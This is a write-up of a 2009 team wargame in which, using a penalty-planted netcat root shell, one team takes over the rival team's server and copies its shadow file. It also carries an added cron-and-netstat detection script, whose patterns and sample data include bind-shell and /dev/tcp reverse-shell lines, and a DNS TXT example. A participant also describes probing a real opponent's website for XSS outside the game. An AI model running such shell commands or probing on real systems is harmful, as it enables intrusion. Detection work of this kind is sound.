Zen of IP
The first cycle started on 25th of July 2009 18:00 UTC and ended on 27th of July. The required tasks were as follows:
- non-fake identd
- bzflag server
Both teams managed to finish their tasks on time and the first cycle concluded with great success. So far there has been some talk about social engineering going on, but nothing very concrete. The rinzai team has challenged soto to a very Zen deathmatch on their bzflag server; it is highly doubtful that anything good will come of that.
The second cycle started on 27th of July 18:00 UTC and ended on 1st of August. The required tasks were as follows:
- Webserver with mod_python
- LDAP database
The end of the cycle was pushed back to allow the tasks to be completed.
The third cycle started on 1st of August 20:00 UTC and will end on 8th of August. The required tasks are as follows:
- User-uploadable php and python web scripts
- DNS service that returns TXT records with man pages
As neither team was quite able to finish their tasks in time, a certain Mr Bad Hacker managed to create a user account on both the rinzai and soto servers, with a very predictable password. This penalty bought both teams one day to finish their tasks.
Continuing the pattern, neither team managed to finish either task by the extended deadline. This prompted the return of Mr Bad Hacker, who once again penetrated both systems in a similar but considerably more severe manner. This penalty bought both teams one more day to finish their tasks.
Furthermore, as the new services were still missing, vulnerable versions of udev and pulseaudio were forcibly installed on both team servers, with the badhacker account still available. However, both teams were able to secure their systems before the other team could take advantage of the vulnerabilities.
As a final penalty, a cron job was set up to create a root shell on port 2222 on both teams' machines. Using this root shell, the soto team managed to compromise rinzai and kick them off their box. This happened roughly around 12th of August 00:00 UTC. The soto team locked the rinzai box down and started working on securing it in order to put the services back up, as mandated by the endgame rules.
However, as the rinzai team did not insist (strongly enough :) on getting the services back up and the soto team was slow to revive them, the game was ended and the soto team was declared the winner, having won by exploiting a penalty-induced vulnerability.
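The final penalty is a persistence case rather than a one-off backdoor: the listener on port 2222 is re-created by cron, so killing the process or rebooting the box does not remove it, and the only fix is to find and delete the cron entry. The script below is an added example for this page and is not the organizer's cron job (whose actual command the write-up does not show) nor either team's code. It correlates the listening sockets in `netstat -antp` output (the command the Soto account uses) with cron entries that can spawn a shell, so that a listener which a cron job keeps respawning is reported together with the entry that respawns it. The crontab and netstat text are constructed samples, and the tool names and port spellings it recognises are this example's own assumptions, not a complete list.

```python
"""
Added example, not code from the Zen of IP write-up: find a cron-planted
listener and the cron entry that keeps re-creating it.  The crontab and
netstat text below are constructed samples; the tool names and port
spellings recognised are this example's own assumptions, not a complete list.
"""
import re

# Commands a cron entry can use to open a listener or a reverse shell.
SHELL_TOOL_RE = re.compile(
    r'(?:^|[\s/;|&(])(?:nc|ncat|netcat|socat|telnet)(?=\s|$)|/dev/tcp/|mkfifo')

# Port spellings for the common listener idioms (constructed, not exhaustive).
PORT_RES = [
    re.compile(r'\s-l\s*-?p?\s*(\d{2,5})\b'),       # nc -l -p 2222, nc -lp 2222, ncat -l 2222
    re.compile(r'\s-p\s*(\d{2,5})\b'),              # ... -e /bin/sh -p 2222
    re.compile(r'TCP-LISTEN:(\d{2,5})\b'),          # socat TCP-LISTEN:2222,fork EXEC:/bin/sh
    re.compile(r'/dev/tcp/[\w.\-]+/(\d{2,5})\b'),   # bash -i >& /dev/tcp/host/2222
]


def cron_entries(lines, has_user_field):
    """Yield (user, command) for each job in a crontab.  /etc/crontab and
    /etc/cron.d/* carry a user field; per-user spool files (crontab -l) do not."""
    for line in lines:
        s = line.strip()
        if not s or s.startswith('#') or re.match(r'^\w+\s*=', s):
            continue                                  # blank, comment, VAR=value
        toks = s.split()
        n = 1 if toks[0].startswith('@') else 5       # @reboot etc. vs five time fields
        if has_user_field:
            yield toks[n], ' '.join(toks[n + 1:])
        else:
            yield None, ' '.join(toks[n:])


def suspicious_cron_entries(lines, has_user_field):
    """Cron jobs whose command can spawn a shell, with any ports they name."""
    hits = []
    for user, cmd in cron_entries(lines, has_user_field):
        if SHELL_TOOL_RE.search(cmd):
            ports = {int(m.group(1)) for rx in PORT_RES for m in rx.finditer(cmd)}
            hits.append({'user': user, 'cmd': cmd, 'ports': ports})
    return hits


def parse_listeners(netstat_lines):
    """Map listening TCP port -> (pid, program) from `netstat -antp` output
    (`ss -ltnp` prints a different layout and would need its own parser)."""
    listeners = {}
    for line in netstat_lines:
        f = line.split()
        if len(f) < 6 or f[0] not in ('tcp', 'tcp6') or f[5] != 'LISTEN':
            continue
        port = int(f[3].rsplit(':', 1)[1])
        pid, prog = ('?', '?')
        if len(f) > 6 and '/' in f[6]:               # "4711/nc"; "-" when not run as root
            pid, prog = f[6].split('/', 1)
        listeners[port] = (pid, prog)
    return listeners


def triage(cron_lines, netstat_lines, expected_ports, has_user_field=True):
    """Correlate live listeners with cron jobs.  A listener that a cron job
    re-creates is persistence: killing the process (or rebooting) does not
    remove it, the cron entry has to go.  Unexpected listeners with no cron
    job, and shell-spawning cron jobs with no live listener, are listed too."""
    cron_hits = suspicious_cron_entries(cron_lines, has_user_field)
    findings = []
    for port, (pid, prog) in sorted(parse_listeners(netstat_lines).items()):
        respawners = [h for h in cron_hits if port in h['ports']]
        if port in expected_ports and not respawners:
            continue
        findings.append({'port': port, 'pid': pid, 'program': prog, 'cron': respawners})
    for h in cron_hits:
        if not any(h in f['cron'] for f in findings):
            findings.append({'port': None, 'pid': None, 'program': None, 'cron': [h]})
    return findings


# Constructed sample input; the nc line stands in for the penalty cron job.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 *   * * *   root    nc -l -p 2222 -e /bin/sh
@reboot         root    /usr/local/bin/backup.sh
"""

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      4711/nc
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      900/named
tcp        0      0 10.0.0.5:22             10.0.0.9:51234          ESTABLISHED 4000/sshd
"""

if __name__ == '__main__':
    for finding in triage(SAMPLE_CRONTAB.splitlines(), SAMPLE_NETSTAT.splitlines(),
                          expected_ports={22, 53}):
        print(finding)
```

On a live box the crontab lines come from /etc/crontab and /etc/cron.d/* (with the user field) plus root's own spool crontab (`crontab -l`, no user field), and the socket list from `netstat -antp` run as root, since the PID/Program column is blank for processes you do not own. The scripts in /etc/cron.hourly and friends, `at` jobs and init scripts are other places a respawner can hide and are outside what this script reads.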
In the beginning, OSCoder patched the kernel with grsec and MaXe was quick to install IPKungFu for IPTables. Zakolus did some random stuff which I can't even remember, and I did some lame nmap scans and installed oidentd and bzflag. stevefrench never showed up for the entire wargame. We talked on the mailing list using a PGP team key, for messages we didn't want/trust Siim with.
OSCoder chrooted bzflag (and oidentd?) and both teams sat around doing nothing after that. We kind of wasted the second and third cycles, because the third cycle made the second cycle pointless. The LDAP server was also pretty lame; I took no part in it.
When the DNS task came round, I used bash to output the man pages into a bind zone file. The only problem was that bind never responded correctly to any of the dig commands I sent to it. Soon, Siim stepped in and the game was pretty much over for Rinzai, as MaXe was online at the time the root shell was created on both boxes with netcat.
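The DNS task (TXT records carrying man pages) and the bash-to-zone-file approach in the account above leave out the two things that usually make a hand-built TXT zone fail to load or answer: a TXT string is limited to 255 bytes, and quotes and backslashes inside it have to be escaped. The code below is an added example for this page, not the team's script and not anything the write-up describes. It chunks a page into 255-byte strings, escapes them for a BIND zone file and reassembles the page from the records; the record layout (a count record at `<page>.<origin>` and the text in order under `<n>.<page>.<origin>`), the origin `man.example` and the sample page text are this example's own assumptions.

```python
"""
Added example, not code from the Zen of IP write-up: one way to publish man
pages as DNS TXT records and read them back.  The task only said "TXT records
with man pages"; the record layout (a count record at <page>.<origin> and the
text in order under <n>.<page>.<origin>), the zone origin man.example and the
sample page text are this example's own assumptions.
"""
import re

MAX_TXT_STRING = 255   # RFC 1035 <character-string>: one length byte, so 255 bytes max
ZONE_RE = re.compile(r'^(\S+)\.\s+IN\s+TXT\s+"(.*)"$')


def txt_escape(raw: bytes) -> str:
    """Quote one TXT string for a BIND zone file: backslash and double quote
    are escaped, other non-printable bytes become \\DDD (decimal)."""
    out = []
    for b in raw:
        if b == 0x22:                      # "
            out.append('\\"')
        elif b == 0x5c:                    # backslash
            out.append('\\\\')
        elif 0x20 <= b <= 0x7e:
            out.append(chr(b))
        else:
            out.append('\\%03d' % b)
    return ''.join(out)


def txt_unescape(s: str) -> bytes:
    """Inverse of txt_escape; dig prints TXT data with the same escaping."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            digits = s[i + 1:i + 4]
            if len(digits) == 3 and all('0' <= c <= '9' for c in digits):
                out.append(int(digits))
                i += 4
            else:
                out.append(ord(s[i + 1]))
                i += 2
        else:
            out.append(ord(s[i]))
            i += 1
    return bytes(out)


def man_to_zone(page: str, origin: str, text: str) -> list:
    """Zone-file lines for one man page.  A single name's TXT RRset does not
    come back in file order (BIND's rrset-order is cyclic by default), so the
    chunk index lives in the owner name and a count record at the apex tells
    the reader how many chunks to fetch.  Chunking happens on the raw bytes
    before escaping: the 255-byte limit is on the wire form, and escaping
    only inflates the zone-file text."""
    data = text.encode('utf-8')
    chunks = [data[i:i + MAX_TXT_STRING]
              for i in range(0, len(data), MAX_TXT_STRING)] or [b'']
    base = f'{page}.{origin}'
    lines = [f'{base}. IN TXT "count={len(chunks)}"']
    lines += [f'{n}.{base}. IN TXT "{txt_escape(c)}"' for n, c in enumerate(chunks)]
    return lines


def zone_to_man(lines, page: str, origin: str) -> str:
    """Reassemble a page from zone lines in any order.  A UTF-8 sequence
    split across two chunks is fine because bytes are joined before decoding."""
    base = f'{page}.{origin}'
    records = {}
    for line in lines:
        m = ZONE_RE.match(line)
        if m:
            records[m.group(1)] = m.group(2)
    count = int(records[base].split('=', 1)[1])
    return b''.join(txt_unescape(records[f'{n}.{base}']) for n in range(count)).decode('utf-8')


# Constructed stand-in for a man page (not a real one); repeated so that it
# spans several 255-byte chunks and contains bytes that need escaping.
SAMPLE_PAGE = (
    'LS(1)                     User Commands                     LS(1)\n'
    '\nNAME\n       ls - list directory contents\n'
    '\nDESCRIPTION\n       A "quoted" word, a backslash \\ and a tab\there.\n'
) * 3

if __name__ == '__main__':
    for line in man_to_zone('ls', 'man.example', SAMPLE_PAGE):
        print(line)
```

Before reloading, run the generated file through `named-checkzone` (an over-long string or an unescaped quote makes the zone fail to load, and a zone that fails to load is one way to get no correct answers to `dig`); afterwards `dig +short TXT 0.ls.man.example @server` should print the first chunk, escaped the same way `txt_unescape` expects.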
So, at the start I wasn't doing much. In fact I was just trying to help with whatever I could, but I didn't use the box at all to start with. However, I did set up a password-protected IRC chatroom on a network I normally use, which I knew I could trust. We also agreed to make sure we would come from the same IPs, or else give notice that we wouldn't, so no impostors would enter the chatroom and gain info.
On a side note, in the very beginning we established a secure communication method on our mailing list by using a private and a public PGP key. I think Malformation made that. Passwords were ridiculously easy, but long enough to take some time to brute-force, even though we didn't care so much about passwords as we knew the opposite team would probably think that we would have insane passwords. Well..
After some time I decided to log into the box and do some test scans, and of course give a lot more ideas to the team. I did some scans of the internal network and the Rinzai team's box; however, something went wrong with the scans. Later on, and today, I know it was because not being root can end up giving bad scans, which I had forgotten earlier. However, I already knew what they were running, since Siim occasionally gave us maps of what each team was running, meaning I wouldn't have to do any scanning myself.
Later on we had set up a lot more, including a webserver with PHP. At that time I decided to harden both the Apache and PHP config files. I also took a look at other stuff on the box but didn't find anything else that needed to be hardened.
More time passed and nothing really happened; our IRC channel was almost empty at all times, except for me, because I was almost always there in my screen session.
Then some of the harder tasks came and nothing really happened. I tried to speak with my team, but kind of no one replied.
Then one night I was probably surfing around the web and had Thunderbird open because I had just received some mails and was awaiting some more. Then a mail came from Siim stating that apparently he had started a root shell with netcat..
Side Note: The first time Mr Badhacker visited the machine, we removed almost all of the bad stuff we believed we had found.
Extra Side Note: Before hardening Apache I did a check on the Rinzai team's leader. I found an XSS hole in his website and did a lot of digging, which was posted to our mailing list, encrypted of course. After a short conversation with some team members we decided that it wasn't appropriate to hack the other members directly. So nothing went on from there and no more Rinzai team members were "investigated", except for a few things about a place / community where 2-3 of them were hanging out.
Well, back to the netcat shell. First I wanted to close it as fast as possible, and I tried several times to log in as root, in a lot of ways, with no luck. I was really confused and wrote a lot of mails to our mailing list (at least 15-20, but that also includes the ones after getting access to the Rinzai team's box). Then I eventually found out that root had /bin/false, or perhaps it was /bin/noshell (or something like that)..
The first thing I did, however, was to connect to the Rinzai box and issue the users command to see who was online (w or who is good too, but I just wanted a quick overview). I also did a netstat -antpe to see if they had connected to our (Soto) box, which, luckily for me, the only user online at Rinzai hadn't. In fact it looked like the user was unaware of the shell running on both machines. First I booted the user off the server, but he reconnected instantly, I guess.. So I disabled SSH in init.d, eventually deleting or chmod -x'ing it later on, just in case they had made some script to auto chmod +x init.d scripts, and then I nc'd back to the Soto box, rebooted that one and then rebooted Rinzai's box very fast.
Both boxes rebooted and it looked like Rinzai wasn't running SSH. So far so good. I nc'd into their box and made sure SSH wasn't running and that no users were online. Good.
Then I started killing all their services and then deleted the service init.d scripts. I also played a little with /etc/shadow and /etc/passwd first to see if I could log in as root or as a new user, but somehow I wasn't able to. I was rushing A LOT and made a lot of errors, so I guess I tried to SSH after killing the service, or I just did something terribly wrong.
After "owning" the Rinzai box, I went to the Soto box, nc'd in as root and made a few mess-ups.. Then I got the server / box rebooted again, I think.. (I did a lot of strange stuff xD).
Then I copied /etc/passwd into GEdit, edited out your users (toor and badhacker) and made sure root would be able to use /bin/bash. Then I sent a reboot signal to the server again and killed the netcat shell.
What I didn't know is that it was running from cron, but I thought someone else from my team might figure that one out. Even so, I did write that the shell kept coming back and that it was probably a cron.d script or some rootkit Siim had installed. The reason I didn't check was that it was getting very late, and if it was a rootkit I couldn't do much either, so I just gave up and called it a night (and went to sleep).
Then I think it became Monday. I was at work and saw some people from the Rinzai team write to the mailing list that they weren't able to get onto their box. I laughed a bit and wondered if Siim would restore their box or not, since I thought of what I did as cheating. At least it worked. I thought, oh well, I won't take credit for this since OSCoder did a lot of work, and I thought it would be best if Malformation wrote it so the whole team would get credit. (I don't have a big ego, nor am I "greedy" in such cases.)
I laughed a bit when he wrote that they got owned, heh, especially when some people really didn't get it.
A last side note: Before screwing over their /etc/shadow files etc., I took a backup, of course, and sent it to the Soto mailing list as well, just for the fun of it :-)